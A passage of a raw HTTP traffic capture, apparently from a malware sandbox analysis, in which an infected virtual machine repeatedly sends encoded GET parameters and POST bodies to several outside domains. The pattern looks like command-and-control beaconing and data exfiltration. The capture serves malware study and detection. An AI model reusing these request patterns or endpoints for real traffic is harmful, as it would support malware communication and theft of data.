                                                                          Date: Thu, 09 Jan 2025 15:52:04 GMT
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                          65 | 192.168.11.20 | 49810 | 47.83.1.90 | 80
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Jan 9, 2025 16:52:06.955643892 CET | 529 | OUT | GET /nkmx/?lV=eUQnbnMYY/LCOqGESTL4TQrP6i0At1UjsamtmjAjCJYjPTSalXudwPcRr9EknZYtOZpCljWDkwtbq6MUXcKSC+3UVsfypEs97CYth90fPOn8W2O2KjrJHqc=&LSbaT=zft4LoBw HTTP/1.1
                                                                          Host: www.givvjn.info
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Jan 9, 2025 16:52:07.952403069 CET | 139 | IN | HTTP/1.1 567 unknown
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 09 Jan 2025 15:52:07 GMT
                                                                          Content-Length: 17
                                                                          Connection: close
                                                                          Data Raw: 52 65 71 75 65 73 74 20 74 6f 6f 20 6c 61 72 67 65
                                                                          Data Ascii: Request too large


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                          66 | 192.168.11.20 | 49811 | 76.223.54.146 | 80
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Jan 9, 2025 16:52:14.120506048 CET | 795 | OUT | POST /t3iv/ HTTP/1.1
                                                                          Host: www.bonheur.tech
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 199
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.bonheur.tech
                                                                          Referer: http://www.bonheur.tech/t3iv/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Ascii: lV=C3faYkUc5r8U2+DWQABtQ+SL5VzdWASC3J6gPGHMuAA3Jh+XO06RM62qVQK+tTQ8R3b8NvwC3zQd4QU8sT+fx/3l5/BU0mAx2VpN3RgrtWzNkDEJDFMtzdn0coghlsKmfj5jgJJggOsTkHDGyAQLTku981CfetEPuKqlIIpfpNxys5W+kUxW9CM1OFXg0N+3Hw==
                                                                          Jan 9, 2025 16:52:14.256603956 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                          content-length: 0
                                                                          connection: close


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                          67 | 192.168.11.20 | 49812 | 76.223.54.146 | 80
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Jan 9, 2025 16:52:16.795026064 CET | 815 | OUT | POST /t3iv/ HTTP/1.1
                                                                          Host: www.bonheur.tech
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 219
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.bonheur.tech
                                                                          Referer: http://www.bonheur.tech/t3iv/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Ascii: lV=C3faYkUc5r8UkKHWD3dtBeSI8VzddgSG3J2gPCfct1Q3JF6XcBaRL62qewK7izQNR3XrNt0C334d4QE8sgXtwv3ngPBS7GAx2VpN3XNOtW7NlwMJDkMuydn1fogh08Kifj5RgIVOgNUTkGzGyRR5IUv42VD9aO5An6SSFYdHhtxQgPbk5mFy+RQHK1uI2P/sa+RfEFJqFhUbQkXxOv7a8dE=
                                                                          Jan 9, 2025 16:52:16.935161114 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                          content-length: 0
                                                                          connection: close


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                          68 | 192.168.11.20 | 49813 | 76.223.54.146 | 80
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Jan 9, 2025 16:52:20.480328083 CET | 5156 | OUT | POST /t3iv/ HTTP/1.1
                                                                          Host: www.bonheur.tech
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 7367
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.bonheur.tech
                                                                          Referer: http://www.bonheur.tech/t3iv/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Jan 9, 2025 16:52:20.616612911 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                          content-length: 0
                                                                          connection: close
                                                                          Jan 9, 2025 16:52:20.616692066 CET | 1289 | OUT | Data Raw: 73 71 45 4a 59 79 48 4a 39 54 58 2b 77 35 2f 56 45 6e 4b 74 45 71 74 36 2f 4b 53 56 76 79 62 67 68 76 4a 65 6c 47 46 50 68 42 6e 4a 77 46 65 64 67 30 6e 34 6c 61 6d 6e 49 6d 2b 72 53 34 58 71 57 57 4d 37 68 65 45 59 42 34 73 74 4a 4d 77 2f 62 41
                                                                          Data Ascii: sqEJYyHJ9TX+w5/VEnKtEqt6/KSVvybghvJelGFPhBnJwFedg0n4lamnIm+rS4XqWWM7heEYB4stJMw/bAhQiGTjFlcntWbgoO1WmxLQrqR6N/BlIcfa1U/I/vmLTPqqzpR8xHv6jhRXbY2B4DxYTx6K+1sPkDjTmpgnAx6phri7sdAQ4M8UeLkOYZJlBGdoglkP3BtX7EiUVuE/cuL0LVW9+MnklIonoyp3vLhbgkrzBr11FNb
                                                                          Jan 9, 2025 16:52:20.616764069 CET | 1519 | OUT | Data Raw: 45 68 71 35 70 48 6c 62 38 4b 75 36 7a 74 44 44 6d 34 47 34 63 63 4a 6e 73 69 6b 54 6d 71 48 67 56 5a 48 46 41 55 31 61 31 56 2b 69 51 6c 65 42 64 4c 70 4d 4d 62 49 53 58 76 33 61 53 71 30 65 30 42 4c 6d 34 6e 75 31 70 34 4d 31 64 75 54 31 66 63
                                                                          Data Ascii: Ehq5pHlb8Ku6ztDDm4G4ccJnsikTmqHgVZHFAU1a1V+iQleBdLpMMbISXv3aSq0e0BLm4nu1p4M1duT1fclFJiwp3ZYvkbUSx+HtuNe1uwAAhdtYKncOU8GRlB+PytkizaHYfXFL9RUxbdfzy3rFg16lwoSLd2LmnBXKtxcVHNWpuvAggcJl/mvvB/x317Q1n2GmOXmQNgzIf0qrgzq21DXSivdejuIlWPggzYO1tEZ6g+tMXK8


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                          69 | 192.168.11.20 | 49814 | 76.223.54.146 | 80
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Jan 9, 2025 16:52:23.149298906 CET | 530 | OUT | GET /t3iv/?lV=P136bSYw/boin6utEBZ7PLC682DYGQHk9qKLeTmXrWAePyaHTSDMFoauBTWx0ig1S3CVFsx30iUtjRVQiBy55I3Yp99Gh3kk8H5H2AEMqkWB6gkiSHADwPc=&LSbaT=zft4LoBw HTTP/1.1
                                                                          Host: www.bonheur.tech
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Jan 9, 2025 16:52:24.321438074 CET | 374 | IN | HTTP/1.1 200 OK
                                                                          content-type: text/html
                                                                          date: Thu, 09 Jan 2025 15:52:24 GMT
                                                                          content-length: 253
                                                                          connection: close
                                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?lV=P136bSYw/boin6utEBZ7PLC682DYGQHk9qKLeTmXrWAePyaHTSDMFoauBTWx0ig1S3CVFsx30iUtjRVQiBy55I3Yp99Gh3kk8H5H2AEMqkWB6gkiSHADwPc=&LSbaT=zft4LoBw"}</script></head></html>


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                          70 | 192.168.11.20 | 49815 | 160.25.166.123 | 80
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Jan 9, 2025 16:52:29.689902067 CET | 783 | OUT | POST /bwjl/ HTTP/1.1
                                                                          Host: www.rpa.asia
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 199
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.rpa.asia
                                                                          Referer: http://www.rpa.asia/bwjl/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Ascii: lV=On/0Uk0gKlcgxz9muO5dHP1vRn5C8VDqjPeKBXnf8PJx+4/uhizA5b56RFWMnqR7kil24MJS2cxM0UDN2gtfjhtWVo5JaHPZc1KzowxNAFsSLMH3ZQXxhJTQIRHr/07jB9rh1l6RgpfCk/EumfrzurH06GJkH09DXubk6XJeGV+BrvpAg3KSSo83gn77Jca1zA==
                                                                          Jan 9, 2025 16:52:30.037815094 CET | 1289 | IN | HTTP/1.1 404 Not Found
                                                                          Connection: close
                                                                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                          pragma: no-cache
                                                                          content-type: text/html
                                                                          content-length: 1251
                                                                          date: Thu, 09 Jan 2025 15:52:29 GMT
                                                                          server: LiteSpeed
                                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
                                                                          Jan 9, 2025 16:52:30.037868023 CET | 200 | IN | Data Raw: 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e
                                                                          Data Ascii: powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                          71 | 192.168.11.20 | 49816 | 160.25.166.123 | 80
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Jan 9, 2025 16:52:32.569895029 CET | 803 | OUT | POST /bwjl/ HTTP/1.1
                                                                          Host: www.rpa.asia
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 219
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.rpa.asia
                                                                          Referer: http://www.rpa.asia/bwjl/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Ascii: lV=On/0Uk0gKlcgjCNmhNRdGv1sfH5CplDmjPaKBVLP89dx9czuggLA8b56elXI46QWkihE4JpS2clM0VzN2TFcxBtUO45HUnPZc1KzowMgAEESI833axXyspTTfhHrp07vB9q01km7gvDCk+0umOrwgrHt0mIMPG07O+/mqG8HHA6ljZka9F+2R7gFkXCTLebuuIMv9Wz1B5zX9ttaUocfm9I=
                                                                          Jan 9, 2025 16:52:32.922620058 CET | 1289 | IN | HTTP/1.1 404 Not Found
                                                                          Connection: close
                                                                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                          pragma: no-cache
                                                                          content-type: text/html
                                                                          content-length: 1251
                                                                          date: Thu, 09 Jan 2025 15:52:32 GMT
                                                                          server: LiteSpeed
                                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
                                                                          Jan 9, 2025 16:52:32.922663927 CET | 200 | IN | Data Raw: 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e
                                                                          Data Ascii: powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                          72 | 192.168.11.20 | 49817 | 160.25.166.123 | 80
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Jan 9, 2025 16:52:35.454987049 CET | 2578 | OUT | POST /bwjl/ HTTP/1.1
                                                                          Host: www.rpa.asia
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 7367
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.rpa.asia
                                                                          Referer: http://www.rpa.asia/bwjl/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Ascii: lV=On/0Uk0gKlcgjCNmhNRdGv1sfH5CplDmjPaKBVLP89lx9pvuiBLA/b56XFXL46RUkkJA4Jto2fdMy3LNwiFcoxtURo5KaHORc063o2sgAEESI+v3NwXyqpTQIRHn/07LB9ik1kiBjZzCkekun8Dw/7H45GIUPGokO+yXqFhsHHOlg4VatEiIEZ0rtjOCCvvjxLcR4wnCBuLM8dViAKcJ3Irqrx69FT+ExeY49n403iE2b8uepxL6LYfBYvicqRpi1VVz4PHjEr0ih2d7+2CYllo2kxFZE9ZlewQZ2FUrdBECzjUQprI+2lu84Eb4Y3AmcS+1vh86YB7cDkBc/L+te1Ja/SBLsL+5tSuRd2rSkKy7TGSkcJ3Od3HHSAVpQ+FGOCkUjtVyy474RpR3AJ6mgr5qZVPKTrVQ/X1sC9LVkxJzfbg2If3lv84aN75soJUUgqi44ndrb5JHzdpuAIzVGeOeG78zJ+vowD0Y5lmTvY4zof1N9lyKYzXX0QBpbBvolu7yM56i/TiqZMaHNNS7wqFqr3JS1+vC7AhGtWMjJ6IujVCsRsgK+qUIHWJmgJEJzZVyXSvsjVkfyhhCk916FtrfIt4i2EJtmWOqJI9TKWVFYBLK+i0lnJgTm4Mk9NWb9HemyRHYowXvCTOFWE1H7WUZctYCr7MowHq7SXMBaDml2lodYWp75l6VH5eySNe+lqxnZdpDr2jXSKpcDUV6jwsTkePhvZaT84T+MvaO3waHYRCTFYfyME86lgYlt4dJ58EfwdM8XBu/cmkLl5OU16BTneJScuZ2MHe5dE2VvhIczCcqhjC3CULC19rSMvKRg35UemXW4CCD/3mGYxVJ9C154GPlSEF+dLnqKP5/M0mSxjhvdbcjMh7THfDR7Mtz7AFa1F2pi4jacqEvRD8xeEf0hwQSb7GuAPT2Kjp5dkVb4u2kfY0Llbh/ZkQDNq60vMEkMsSnyIRuWYpcMX3gOqpZp2mQ/dYYHfWcrOLPaTWI+qJ4i [TRUNCATED]
                                                                          Jan 9, 2025 16:52:35.455009937 CET | 3867 | OUT |
                                                                          Jan 9, 2025 16:52:35.455094099 CET | 1507 | OUT |
                                                                          Jan 9, 2025 16:52:35.806282997 CET | 1289 | IN | HTTP/1.1 404 Not Found
                                                                          Connection: close
                                                                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                          pragma: no-cache
                                                                          content-type: text/html
                                                                          content-length: 1251
                                                                          date: Thu, 09 Jan 2025 15:52:35 GMT
                                                                          server: LiteSpeed
                                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
                                                                          Jan 9, 2025 16:52:35.806313038 CET | 200 | IN | Data Ascii: powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                          73 | 192.168.11.20 | 49818 | 160.25.166.123 | 80
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Jan 9, 2025 16:52:38.335314989 CET | 526 | OUT | GET /bwjl/?lV=DlXUXSIcZnIsgzl0u4NtOaZFY3Bzu0GepY2CMnKH5/Z+wLXeqyLz34dEMj2dm6NLuVk54f0N3OpI5VHZ7BJAsS5zdqtXFQ+nWWO+v3ILJktUUuvXcybstOw=&LSbaT=zft4LoBw HTTP/1.1
                                                                          Host: www.rpa.asia
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Jan 9, 2025 16:52:38.691433907 CET | 1289 | IN | HTTP/1.1 404 Not Found
                                                                          Connection: close
                                                                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                          pragma: no-cache
                                                                          content-type: text/html
                                                                          content-length: 1251
                                                                          date: Thu, 09 Jan 2025 15:52:38 GMT
                                                                          server: LiteSpeed
                                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
                                                                          Jan 9, 2025 16:52:38.691467047 CET | 200 | IN | Data Ascii: powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                          74 | 192.168.11.20 | 49819 | 104.21.13.141 | 80
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Jan 9, 2025 16:52:46.861552000 CET | 795 | OUT | POST /kj1o/ HTTP/1.1
                                                                          Host: www.ogbos88.cyou
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 199
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.ogbos88.cyou
                                                                          Referer: http://www.ogbos88.cyou/kj1o/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Jan 9, 2025 16:52:46.994981050 CET | 810 | IN | HTTP/1.1 301 Moved Permanently
                                                                          Date: Thu, 09 Jan 2025 15:52:46 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 167
                                                                          Connection: close
                                                                          Cache-Control: max-age=3600
                                                                          Expires: Thu, 09 Jan 2025 16:52:46 GMT
                                                                          Location: https://ogbos88vip.click
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1NZm42YGBhnGZaQhzcrJ4iTiTL6gEQpHtxQu5rM%2Bs5PFD2kLNtZ9ICo7qNJ8%2FbPvvZd69h%2By6%2Bk1nZ%2FKO6Gil6PGsSLMSoPt%2BJrhMWV8Rb5oFDHlGrSRtfqveqYlsd1xlV2m"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Vary: Accept-Encoding
                                                                          Server: cloudflare
                                                                          CF-RAY: 8ff598ad483ae80d-ORD
                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                          75 | 192.168.11.20 | 49820 | 104.21.13.141 | 80
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Jan 9, 2025 16:52:49.521169901 CET | 815 | OUT | POST /kj1o/ HTTP/1.1
                                                                          Host: www.ogbos88.cyou
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 219
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.ogbos88.cyou
                                                                          Referer: http://www.ogbos88.cyou/kj1o/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Jan 9, 2025 16:52:49.653971910 CET | 806 | IN | HTTP/1.1 301 Moved Permanently
                                                                          Date: Thu, 09 Jan 2025 15:52:49 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 167
                                                                          Connection: close
                                                                          Cache-Control: max-age=3600
                                                                          Expires: Thu, 09 Jan 2025 16:52:49 GMT
                                                                          Location: https://ogbos88vip.click
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t9MRuK%2FeOM1L4gyS5qh3gVF3PUE4pmF17lKhOpnEGxir0pXlkve2z3O7qi%2B5JY0Vt6oNITJWq6bE3yYfnYxlF3CIRiY097%2F1BsrX2Nea44%2BTgGmGxpF0GEbj5ze2ON0OvPIF"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Vary: Accept-Encoding
                                                                          Server: cloudflare
                                                                          CF-RAY: 8ff598bdeb13636f-ORD
                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                          76 | 192.168.11.20 | 49821 | 104.21.13.141 | 80
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Jan 9, 2025 16:52:52.172091007 CET | 1289 | OUT | POST /kj1o/ HTTP/1.1
                                                                          Host: www.ogbos88.cyou
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 7367
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.ogbos88.cyou
                                                                          Referer: http://www.ogbos88.cyou/kj1o/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Jan 9, 2025 16:52:52.172142982 CET | 3867 | OUT |
                                                                          Jan 9, 2025 16:52:52.172189951 CET | 2808 | OUT |
                                                                          Jan 9, 2025 16:52:52.328084946 CET | 808 | IN | HTTP/1.1 301 Moved Permanently
                                                                          Date: Thu, 09 Jan 2025 15:52:52 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 167
                                                                          Connection: close
                                                                          Cache-Control: max-age=3600
                                                                          Expires: Thu, 09 Jan 2025 16:52:52 GMT
                                                                          Location: https://ogbos88vip.click
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y5deEG7cro%2FoRshQZZ54X7tCRhTRdWjoQqdZVWHuYrI1OLQc%2BHs00bQYA%2Fk5e98vaoZhefee7i05pbdknDlwrVF0f3UY3f%2BvWChXuasOZo5p3thmKmBnk17ItdteQ%2FuH8cOM"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Vary: Accept-Encoding
                                                                          Server: cloudflare
                                                                          CF-RAY: 8ff598ce7e3c86fc-ORD
                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                          77 | 192.168.11.20 | 49822 | 104.21.13.141 | 80
                                                                          Timestamp | Bytes transferred | Direction | Data
